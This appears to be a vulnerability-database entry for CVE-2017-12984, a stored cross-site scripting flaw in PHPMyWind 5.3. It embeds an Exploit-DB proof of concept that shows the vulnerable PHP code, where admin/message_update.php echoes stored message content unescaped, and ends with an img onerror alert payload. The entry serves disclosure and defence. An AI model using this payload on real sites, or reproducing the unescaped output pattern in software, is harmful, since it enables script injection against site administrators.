CVE-2017-12984
medium
CVSS v3
6.1
CVSS v4 NEW
—
VIR risk
7.1
Description
PHPMyWind 5.3 has XSS in shoppingcart.php, related to message.php, admin/message.php, and admin/message_update.php.
Predictions
Exploit likelihood
71%
Patch ETA
—
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or — if you've already worked around this in production — publish your fix to the community-verified tier.
✚ Propose a mitigation on Community → Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
PHPMyWind 5.3 - Cross-Site Scripting
Exploit Title:PHPMyWind 5.3 has XSS
Exploit Author:小雨
Vendor Homepage:http://phpmywind.com
Software Link:http://phpmywind.com/downloads/PHPMyWind_5.3.zip
Version:5.3
CVE:CVE-2017-12984
$r= $dosql->GetOne("SELECT Max(orderid) AS orderid FROM `#@__message`");
$orderid= (empty($r['orderid']) ? 1 : ($r['orderid'] + 1));
$nickname= htmlspecialchars($nickname);//游客(xxx)
$contact= htmlspecialchars($contact); //联系方式
$content= htmlspecialchars($content); //留言内容
$posttime= GetMkTime(time());
$ip= gethostbyname($_SERVER['REMOTE_ADDR']);
$sql= "INSERT INTO `#@__message` (siteid, nickname, contact, content, orderid, posttime, htop, rtop, checkinfo, ip) VALUES (1, '$nickname', '$contact', '$content', '$orderid', '$posttime', '', '', 'false', '$ip')";
if($dosql->ExecNoneQuery($sql))
{
ShowMsg('留言成功,感谢您的支持!','message.php');
exit();
}
}
可以看出使用htmlspecialchars进行过滤,带入库中.
跟进content参数。
127.0.0.1/PHPMyWind_5.3/admin/ message_update.php
<?php require_once(dirname(__FILE__).'/inc/config.inc.php');IsModelPriv('message'); ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>修改留言</title>
<link href="templates/style/admin.css" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="templates/js/jquery.min.js"></script>
<script type="text/javascript" src="templates/js/checkf.func.js"></script>
<script type="text/javascript" src="editor/kindeditor-min.js"></script>
<script type="text/javascript" src="editor/lang/zh_CN.js"></script>
</head>
<body>
<?php
$row = $dosql->GetOne("SELECT * FROM `#@__message` WHERE `id`=$id");
?>
<div class="formHeader"> <span class="title">修改留言</span> <a href="javascript:location.reload();" class="reload">刷新</a> </div>
<form name="form" id="form" method="post" action="message_save.php">
<table width="100%" border="0" cellspacing="0" cellpadding="0" class="formTable">
<tr>
<td width="25%" height="40" align="right">用户名:</td>
<td width="75%"><strong><?php echo $row['nickname'] ?></strong></td>
</tr>
<tr>
<td height="40" align="right">联系方式:</td>
<td><input type="text" name="contact" id="contact" class="input" value="<?php echo $row['contact'] ?>" /></td>
</tr>
<tr>
<td height="198" align="right">留言内容:</td>
<td><textarea name="content" id="content"><?php echo $row['content'] ?></textarea>
<script>
p:33
<td><textarea name="content" id="content"><?php echo $row['content'] ?></textarea>
后台直接取出content参数,数据并未进行转义操作。
EXP: “><img/src=x onerror=alert(2001)><“‘Application impact
| Vendor | Product | Versions | Fixed |
|---|---|---|---|
| phpmywind | phpmywind | 5.3 | |
References
CWEs
CWE-79
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.